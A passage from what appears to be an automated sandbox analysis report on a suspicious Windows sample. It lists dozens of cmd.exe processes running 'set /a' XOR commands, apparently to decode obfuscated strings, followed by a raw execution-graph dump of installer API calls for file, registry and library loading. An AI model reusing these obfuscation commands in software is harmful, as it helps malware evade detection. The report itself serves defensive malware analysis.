                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:118
                                              Start time:11:24:58
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x553C7D2C^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:119
                                              Start time:11:24:58
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:120
                                              Start time:11:24:59
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x4B6C7965^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:121
                                              Start time:11:24:59
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:122
                                              Start time:11:24:59
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x50792774^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:123
                                              Start time:11:24:59
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:124
                                              Start time:11:25:00
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x15793C65^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:125
                                              Start time:11:25:00
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:126
                                              Start time:11:25:00
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x09216475^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:127
                                              Start time:11:25:00
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:128
                                              Start time:11:25:01
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x09696575^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:129
                                              Start time:11:25:01
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:130
                                              Start time:11:25:02
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x15733C65^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:131
                                              Start time:11:25:02
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:132
                                              Start time:11:25:02
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x0975752C^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:133
                                              Start time:11:25:03
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:134
                                              Start time:11:25:03
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x19697C2C^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:135
                                              Start time:11:25:03
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:136
                                              Start time:11:25:04
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x172B6678^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:137
                                              Start time:11:25:04
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:138
                                              Start time:11:25:04
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x4C2A3037^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:139
                                              Start time:11:25:04
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:140
                                              Start time:11:25:05
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x0A6B6F7F^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:141
                                              Start time:11:25:05
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:19.2%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:16.3%
                                                Total number of Nodes:1609
                                                Total number of Limit Nodes:34
                                                execution_graph 4215 401941 4216 401943 4215->4216 4221 402da6 4216->4221 4222 402db2 4221->4222 4267 406544 4222->4267 4225 401948 4227 405c13 4225->4227 4309 405ede 4227->4309 4230 405c52 4233 405d7d 4230->4233 4323 406507 lstrcpynW 4230->4323 4231 405c3b DeleteFileW 4232 401951 4231->4232 4233->4232 4352 40683d FindFirstFileW 4233->4352 4235 405c78 4236 405c8b 4235->4236 4237 405c7e lstrcatW 4235->4237 4324 405e22 lstrlenW 4236->4324 4238 405c91 4237->4238 4241 405ca1 lstrcatW 4238->4241 4242 405c97 4238->4242 4244 405cac lstrlenW FindFirstFileW 4241->4244 4242->4241 4242->4244 4247 405d72 4244->4247 4266 405cce 4244->4266 4245 405d9b 4355 405dd6 lstrlenW CharPrevW 4245->4355 4247->4233 4249 405d55 FindNextFileW 4253 405d6b FindClose 4249->4253 4249->4266 4250 405bcb 5 API calls 4252 405dad 4250->4252 4254 405db1 4252->4254 4255 405dc7 4252->4255 4253->4247 4254->4232 4259 405569 24 API calls 4254->4259 4257 405569 24 API calls 4255->4257 4257->4232 4258 405c13 60 API calls 4258->4266 4260 405dbe 4259->4260 4261 4062c7 36 API calls 4260->4261 4263 405dc5 4261->4263 4262 405569 24 API calls 4262->4249 4263->4232 4266->4249 4266->4258 4266->4262 4328 406507 lstrcpynW 4266->4328 4329 405bcb 4266->4329 4337 405569 4266->4337 4348 4062c7 MoveFileExW 4266->4348 4282 406551 4267->4282 4268 406774 4269 402dd3 4268->4269 4300 406507 lstrcpynW 4268->4300 4269->4225 4284 40678e 4269->4284 4271 406742 lstrlenW 4271->4282 4272 406544 10 API calls 4272->4271 4273 406659 GetSystemDirectoryW 4273->4282 4277 40666c GetWindowsDirectoryW 4277->4282 4278 4066e3 lstrcatW 4278->4282 4279 406544 10 API calls 4279->4282 4280 40678e 5 API calls 4280->4282 4281 40669b SHGetSpecialFolderLocation 4281->4282 4283 4066b3 SHGetPathFromIDListW CoTaskMemFree 4281->4283 4282->4268 4282->4271 4282->4272 4282->4273 4282->4277 4282->4278 4282->4279 4282->4280 4282->4281 4293 4063d5 4282->4293 4298 40644e wsprintfW 4282->4298 4299 406507 lstrcpynW 4282->4299 4283->4282 4290 40679b 4284->4290 4285 406816 CharPrevW 4286 406811 4285->4286 4286->4285 4288 406837 4286->4288 4287 406804 CharNextW 4287->4286 4287->4290 4288->4225 4290->4286 4290->4287 4291 4067f0 CharNextW 4290->4291 4292 4067ff CharNextW 4290->4292 4305 405e03 4290->4305 4291->4290 4292->4287 4301 406374 4293->4301 4296 406439 4296->4282 4297 406409 RegQueryValueExW RegCloseKey 4297->4296 4298->4282 4299->4282 4300->4269 4302 406383 4301->4302 4303 406387 4302->4303 4304 40638c RegOpenKeyExW 4302->4304 4303->4296 4303->4297 4304->4303 4306 405e09 4305->4306 4307 405e1f 4306->4307 4308 405e10 CharNextW 4306->4308 4307->4290 4308->4306 4358 406507 lstrcpynW 4309->4358 4311 405eef 4359 405e81 CharNextW CharNextW 4311->4359 4314 405c33 4314->4230 4314->4231 4315 40678e 5 API calls 4318 405f05 4315->4318 4316 405f36 lstrlenW 4317 405f41 4316->4317 4316->4318 4319 405dd6 3 API calls 4317->4319 4318->4314 4318->4316 4320 40683d 2 API calls 4318->4320 4322 405e22 2 API calls 4318->4322 4321 405f46 GetFileAttributesW 4319->4321 4320->4318 4321->4314 4322->4316 4323->4235 4325 405e30 4324->4325 4326 405e42 4325->4326 4327 405e36 CharPrevW 4325->4327 4326->4238 4327->4325 4327->4326 4328->4266 4365 405fd2 GetFileAttributesW 4329->4365 4331 405bf8 4331->4266 4333 405be6 RemoveDirectoryW 4335 405bf4 4333->4335 4334 405bee DeleteFileW 4334->4335 4335->4331 4336 405c04 SetFileAttributesW 4335->4336 4336->4331 4338 405584 4337->4338 4347 405626 4337->4347 4339 4055a0 lstrlenW 4338->4339 4340 406544 17 API calls 4338->4340 4341 4055c9 4339->4341 4342 4055ae lstrlenW 4339->4342 4340->4339 4343 4055dc 4341->4343 4344 4055cf SetWindowTextW 4341->4344 4345 4055c0 lstrcatW 4342->4345 4342->4347 4346 4055e2 SendMessageW SendMessageW SendMessageW 4343->4346 4343->4347 4344->4343 4345->4341 4346->4347 4347->4266 4349 4062e8 4348->4349 4350 4062db 4348->4350 4349->4266 4368 40614d 4350->4368 4353 406853 FindClose 4352->4353 4354 405d97 4352->4354 4353->4354 4354->4232 4354->4245 4356 405df2 lstrcatW 4355->4356 4357 405da1 4355->4357 4356->4357 4357->4250 4358->4311 4360 405eb0 4359->4360 4361 405e9e 4359->4361 4363 405e03 CharNextW 4360->4363 4364 405ed4 4360->4364 4361->4360 4362 405eab CharNextW 4361->4362 4362->4364 4363->4360 4364->4314 4364->4315 4366 405bd7 4365->4366 4367 405fe4 SetFileAttributesW 4365->4367 4366->4331 4366->4333 4366->4334 4367->4366 4369 4061a3 GetShortPathNameW 4368->4369 4370 40617d 4368->4370 4371 4062c2 4369->4371 4372 4061b8 4369->4372 4395 405ff7 GetFileAttributesW CreateFileW 4370->4395 4371->4349 4372->4371 4374 4061c0 wsprintfA 4372->4374 4376 406544 17 API calls 4374->4376 4375 406187 CloseHandle GetShortPathNameW 4375->4371 4377 40619b 4375->4377 4378 4061e8 4376->4378 4377->4369 4377->4371 4396 405ff7 GetFileAttributesW CreateFileW 4378->4396 4380 4061f5 4380->4371 4381 406204 GetFileSize GlobalAlloc 4380->4381 4382 406226 4381->4382 4383 4062bb CloseHandle 4381->4383 4397 40607a ReadFile 4382->4397 4383->4371 4388 406245 lstrcpyA 4391 406267 4388->4391 4389 406259 4390 405f5c 4 API calls 4389->4390 4390->4391 4392 40629e SetFilePointer 4391->4392 4404 4060a9 WriteFile 4392->4404 4395->4375 4396->4380 4398 406098 4397->4398 4398->4383 4399 405f5c lstrlenA 4398->4399 4400 405f9d lstrlenA 4399->4400 4401 405fa5 4400->4401 4402 405f76 lstrcmpiA 4400->4402 4401->4388 4401->4389 4402->4401 4403 405f94 CharNextA 4402->4403 4403->4400 4405 4060c7 GlobalFree 4404->4405 4405->4383 4406 4015c1 4407 402da6 17 API calls 4406->4407 4408 4015c8 4407->4408 4409 405e81 4 API calls 4408->4409 4421 4015d1 4409->4421 4410 401631 4412 401663 4410->4412 4413 401636 4410->4413 4411 405e03 CharNextW 4411->4421 4416 401423 24 API calls 4412->4416 4433 401423 4413->4433 4422 40165b 4416->4422 4420 40164a SetCurrentDirectoryW 4420->4422 4421->4410 4421->4411 4423 401617 GetFileAttributesW 4421->4423 4425 405ad2 4421->4425 4428 405a38 CreateDirectoryW 4421->4428 4437 405ab5 CreateDirectoryW 4421->4437 4423->4421 4440 4068d4 GetModuleHandleA 4425->4440 4429 405a85 4428->4429 4430 405a89 GetLastError 4428->4430 4429->4421 4430->4429 4431 405a98 SetFileSecurityW 4430->4431 4431->4429 4432 405aae GetLastError 4431->4432 4432->4429 4434 405569 24 API calls 4433->4434 4435 401431 4434->4435 4436 406507 lstrcpynW 4435->4436 4436->4420 4438 405ac5 4437->4438 4439 405ac9 GetLastError 4437->4439 4438->4421 4439->4438 4441 4068f0 4440->4441 4442 4068fa GetProcAddress 4440->4442 4446 406864 GetSystemDirectoryW 4441->4446 4444 405ad9 4442->4444 4444->4421 4445 4068f6 4445->4442 4445->4444 4448 406886 wsprintfW LoadLibraryExW 4446->4448 4448->4445 5273 401c43 5274 402d84 17 API calls 5273->5274 5275 401c4a 5274->5275 5276 402d84 17 API calls 5275->5276 5277 401c57 5276->5277 5278 401c6c 5277->5278 5279 402da6 17 API calls 5277->5279 5280 401c7c 5278->5280 5281 402da6 17 API calls 5278->5281 5279->5278 5282 401cd3 5280->5282 5283 401c87 5280->5283 5281->5280 5284 402da6 17 API calls 5282->5284 5285 402d84 17 API calls 5283->5285 5286 401cd8 5284->5286 5287 401c8c 5285->5287 5288 402da6 17 API calls 5286->5288 5289 402d84 17 API calls 5287->5289 5291 401ce1 FindWindowExW 5288->5291 5290 401c98 5289->5290 5292 401cc3 SendMessageW 5290->5292 5293 401ca5 SendMessageTimeoutW 5290->5293 5294 401d03 5291->5294 5292->5294 5293->5294 5295 4028c4 5296 4028ca 5295->5296 5297 4028d2 FindClose 5296->5297 5298 402c2a 5296->5298 5297->5298 5309 4016cc 5310 402da6 17 API calls 5309->5310 5311 4016d2 GetFullPathNameW 5310->5311 5314 4016ec 5311->5314 5318 40170e 5311->5318 5312 401723 GetShortPathNameW 5313 402c2a 5312->5313 5315 40683d 2 API calls 5314->5315 5314->5318 5316 4016fe 5315->5316 5316->5318 5319 406507 lstrcpynW 5316->5319 5318->5312 5318->5313 5319->5318 5320 401e4e GetDC 5321 402d84 17 API calls 5320->5321 5322 401e60 GetDeviceCaps MulDiv ReleaseDC 5321->5322 5323 402d84 17 API calls 5322->5323 5324 401e91 5323->5324 5325 406544 17 API calls 5324->5325 5326 401ece CreateFontIndirectW 5325->5326 5327 402638 5326->5327 5328 402950 5329 402da6 17 API calls 5328->5329 5331 40295c 5329->5331 5330 402972 5333 405fd2 2 API calls 5330->5333 5331->5330 5332 402da6 17 API calls 5331->5332 5332->5330 5334 402978 5333->5334 5356 405ff7 GetFileAttributesW CreateFileW 5334->5356 5336 402985 5337 402a3b 5336->5337 5340 4029a0 GlobalAlloc 5336->5340 5341 402a23 5336->5341 5338 402a42 DeleteFileW 5337->5338 5339 402a55 5337->5339 5338->5339 5340->5341 5342 4029b9 5340->5342 5343 4032b4 35 API calls 5341->5343 5357 4034af SetFilePointer 5342->5357 5345 402a30 CloseHandle 5343->5345 5345->5337 5346 4029bf 5347 403499 ReadFile 5346->5347 5348 4029c8 GlobalAlloc 5347->5348 5349 4029d8 5348->5349 5350 402a0c 5348->5350 5351 4032b4 35 API calls 5349->5351 5352 4060a9 WriteFile 5350->5352 5355 4029e5 5351->5355 5353 402a18 GlobalFree 5352->5353 5353->5341 5354 402a03 GlobalFree 5354->5350 5355->5354 5356->5336 5357->5346 5358 404ed0 GetDlgItem GetDlgItem 5359 404f22 7 API calls 5358->5359 5366 405147 5358->5366 5360 404fc9 DeleteObject 5359->5360 5361 404fbc SendMessageW 5359->5361 5362 404fd2 5360->5362 5361->5360 5363 405009 5362->5363 5367 406544 17 API calls 5362->5367 5364 404463 18 API calls 5363->5364 5369 40501d 5364->5369 5365 4052d5 5371 4052e7 5365->5371 5372 4052df SendMessageW 5365->5372 5370 405229 5366->5370 5390 4051b6 5366->5390 5412 404e1e SendMessageW 5366->5412 5368 404feb SendMessageW SendMessageW 5367->5368 5368->5362 5375 404463 18 API calls 5369->5375 5370->5365 5376 405282 SendMessageW 5370->5376 5401 40513a 5370->5401 5379 405300 5371->5379 5380 4052f9 ImageList_Destroy 5371->5380 5392 405310 5371->5392 5372->5371 5373 4044ca 8 API calls 5378 4054d6 5373->5378 5391 40502e 5375->5391 5382 405297 SendMessageW 5376->5382 5376->5401 5377 40521b SendMessageW 5377->5370 5383 405309 GlobalFree 5379->5383 5379->5392 5380->5379 5381 40548a 5387 40549c ShowWindow GetDlgItem ShowWindow 5381->5387 5381->5401 5385 4052aa 5382->5385 5383->5392 5384 405109 GetWindowLongW SetWindowLongW 5386 405122 5384->5386 5396 4052bb SendMessageW 5385->5396 5388 405127 ShowWindow 5386->5388 5389 40513f 5386->5389 5387->5401 5410 404498 SendMessageW 5388->5410 5411 404498 SendMessageW 5389->5411 5390->5370 5390->5377 5391->5384 5395 405081 SendMessageW 5391->5395 5397 405104 5391->5397 5398 4050d3 SendMessageW 5391->5398 5399 4050bf SendMessageW 5391->5399 5392->5381 5405 40534b 5392->5405 5417 404e9e 5392->5417 5395->5391 5396->5365 5397->5384 5397->5386 5398->5391 5399->5391 5401->5373 5402 405455 5403 405460 InvalidateRect 5402->5403 5406 40546c 5402->5406 5403->5406 5404 405379 SendMessageW 5408 40538f 5404->5408 5405->5404 5405->5408 5406->5381 5426 404dd9 5406->5426 5407 405403 SendMessageW SendMessageW 5407->5408 5408->5402 5408->5407 5410->5401 5411->5366 5413 404e41 GetMessagePos ScreenToClient SendMessageW 5412->5413 5414 404e7d SendMessageW 5412->5414 5415 404e7a 5413->5415 5416 404e75 5413->5416 5414->5416 5415->5414 5416->5390 5429 406507 lstrcpynW 5417->5429 5419 404eb1 5430 40644e wsprintfW 5419->5430 5421 404ebb 5422 40140b 2 API calls 5421->5422 5423 404ec4 5422->5423 5431 406507 lstrcpynW 5423->5431 5425 404ecb 5425->5405 5432 404d10 5426->5432 5428 404dee 5428->5381 5429->5419 5430->5421 5431->5425 5433 404d29 5432->5433 5434 406544 17 API calls 5433->5434 5435 404d8d 5434->5435 5436 406544 17 API calls 5435->5436 5437 404d98 5436->5437 5438 406544 17 API calls 5437->5438 5439 404dae lstrlenW wsprintfW SetDlgItemTextW 5438->5439 5439->5428 5440 6eac103d 5443 6eac101b 5440->5443 5450 6eac15b6 5443->5450 5445 6eac1020 5446 6eac1024 5445->5446 5447 6eac1027 GlobalAlloc 5445->5447 5448 6eac15dd 3 API calls 5446->5448 5447->5446 5449 6eac103b 5448->5449 5452 6eac15bc 5450->5452 5451 6eac15c2 5451->5445 5452->5451 5453 6eac15ce GlobalFree 5452->5453 5453->5445 5454 4045d3 lstrlenW 5455 4045f2 5454->5455 5456 4045f4 WideCharToMultiByte 5454->5456 5455->5456 5457 404954 5458 404980 5457->5458 5459 404991 5457->5459 5518 405b4b GetDlgItemTextW 5458->5518 5461 40499d GetDlgItem 5459->5461 5466 4049fc 5459->5466 5463 4049b1 5461->5463 5462 40498b 5465 40678e 5 API calls 5462->5465 5468 4049c5 SetWindowTextW 5463->5468 5473 405e81 4 API calls 5463->5473 5464 404ae0 5516 404c8f 5464->5516 5520 405b4b GetDlgItemTextW 5464->5520 5465->5459 5466->5464 5470 406544 17 API calls 5466->5470 5466->5516 5471 404463 18 API calls 5468->5471 5469 404b10 5474 405ede 18 API calls 5469->5474 5475 404a70 SHBrowseForFolderW 5470->5475 5476 4049e1 5471->5476 5472 4044ca 8 API calls 5477 404ca3 5472->5477 5478 4049bb 5473->5478 5479 404b16 5474->5479 5475->5464 5480 404a88 CoTaskMemFree 5475->5480 5481 404463 18 API calls 5476->5481 5478->5468 5482 405dd6 3 API calls 5478->5482 5521 406507 lstrcpynW 5479->5521 5483 405dd6 3 API calls 5480->5483 5484 4049ef 5481->5484 5482->5468 5485 404a95 5483->5485 5519 404498 SendMessageW 5484->5519 5488 404acc SetDlgItemTextW 5485->5488 5493 406544 17 API calls 5485->5493 5488->5464 5489 4049f5 5491 4068d4 5 API calls 5489->5491 5490 404b2d 5492 4068d4 5 API calls 5490->5492 5491->5466 5504 404b34 5492->5504 5494 404ab4 lstrcmpiW 5493->5494 5494->5488 5497 404ac5 lstrcatW 5494->5497 5495 404b75 5522 406507 lstrcpynW 5495->5522 5497->5488 5498 404b7c 5499 405e81 4 API calls 5498->5499 5500 404b82 GetDiskFreeSpaceW 5499->5500 5503 404ba6 MulDiv 5500->5503 5505 404bcd 5500->5505 5502 405e22 2 API calls 5502->5504 5503->5505 5504->5495 5504->5502 5504->5505 5506 404c3e 5505->5506 5507 404dd9 20 API calls 5505->5507 5508 404c61 5506->5508 5509 40140b 2 API calls 5506->5509 5510 404c2b 5507->5510 5523 404485 KiUserCallbackDispatcher 5508->5523 5509->5508 5512 404c40 SetDlgItemTextW 5510->5512 5513 404c30 5510->5513 5512->5506 5515 404d10 20 API calls 5513->5515 5514 404c7d 5514->5516 5524 4048ad 5514->5524 5515->5506 5516->5472 5518->5462 5519->5489 5520->5469 5521->5490 5522->5498 5523->5514 5525 4048c0 SendMessageW 5524->5525 5526 4048bb 5524->5526 5525->5516 5526->5525 5527 401956 5528 402da6 17 API calls 5527->5528 5529 40195d lstrlenW 5528->5529 5530 402638 5529->5530 4785 4014d7 4786 402d84 17 API calls 4785->4786 4787 4014dd Sleep 4786->4787 4789 402c2a 4787->4789 5031 4020d8 5032 4020ea 5031->5032 5041 40219c 5031->5041 5033 402da6 17 API calls 5032->5033 5034 4020f1 5033->5034 5036 402da6 17 API calls 5034->5036 5035 401423 24 API calls 5042 4022f6 5035->5042 5037 4020fa 5036->5037 5038 402110 LoadLibraryExW 5037->5038 5039 402102 GetModuleHandleW 5037->5039 5040 402121 5038->5040 5038->5041 5039->5038 5039->5040 5054 406943 5040->5054 5041->5035 5045 402132 5048 402151 5045->5048 5049 40213a 5045->5049 5046 40216b 5047 405569 24 API calls 5046->5047 5050 402142 5047->5050 5059 6eac1817 5048->5059 5051 401423 24 API calls 5049->5051 5050->5042 5052 40218e FreeLibrary 5050->5052 5051->5050 5052->5042 5101 406529 WideCharToMultiByte 5054->5101 5056 406960 5057 406967 GetProcAddress 5056->5057 5058 40212c 5056->5058 5057->5058 5058->5045 5058->5046 5060 6eac184a 5059->5060 5102 6eac1bff 5060->5102 5062 6eac1851 5063 6eac1976 5062->5063 5064 6eac1869 5062->5064 5065 6eac1862 5062->5065 5063->5050 5136 6eac2480 5064->5136 5152 6eac243e 5065->5152 5070 6eac188e 5071 6eac18cd 5070->5071 5072 6eac18af 5070->5072 5076 6eac191e 5071->5076 5077 6eac18d3 5071->5077 5165 6eac2655 5072->5165 5074 6eac1885 5074->5070 5146 6eac2b98 5074->5146 5075 6eac187f 5075->5074 5080 6eac1890 5075->5080 5084 6eac2655 9 API calls 5076->5084 5183 6eac1666 5077->5183 5078 6eac1898 5078->5070 5162 6eac2e23 5078->5162 5079 6eac18b5 5175 6eac1654 5079->5175 5156 6eac2810 5080->5156 5088 6eac190f 5084->5088 5092 6eac1965 5088->5092 5189 6eac2618 5088->5189 5090 6eac1896 5090->5070 5091 6eac2655 9 API calls 5091->5088 5092->5063 5096 6eac196f GlobalFree 5092->5096 5096->5063 5098 6eac1951 5098->5092 5193 6eac15dd wsprintfW 5098->5193 5099 6eac194a FreeLibrary 5099->5098 5101->5056 5196 6eac12bb GlobalAlloc 5102->5196 5104 6eac1c26 5197 6eac12bb GlobalAlloc 5104->5197 5106 6eac1e6b GlobalFree GlobalFree GlobalFree 5107 6eac1e88 5106->5107 5120 6eac1ed2 5106->5120 5108 6eac227e 5107->5108 5116 6eac1e9d 5107->5116 5107->5120 5110 6eac22a0 GetModuleHandleW 5108->5110 5108->5120 5109 6eac1d26 GlobalAlloc 5126 6eac1c31 5109->5126 5113 6eac22c6 5110->5113 5114 6eac22b1 LoadLibraryW 5110->5114 5111 6eac1d71 lstrcpyW 5115 6eac1d7b lstrcpyW 5111->5115 5112 6eac1d8f GlobalFree 5112->5126 5204 6eac16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5113->5204 5114->5113 5114->5120 5115->5126 5116->5120 5200 6eac12cc 5116->5200 5118 6eac2318 5118->5120 5123 6eac2325 lstrlenW 5118->5123 5119 6eac2126 5203 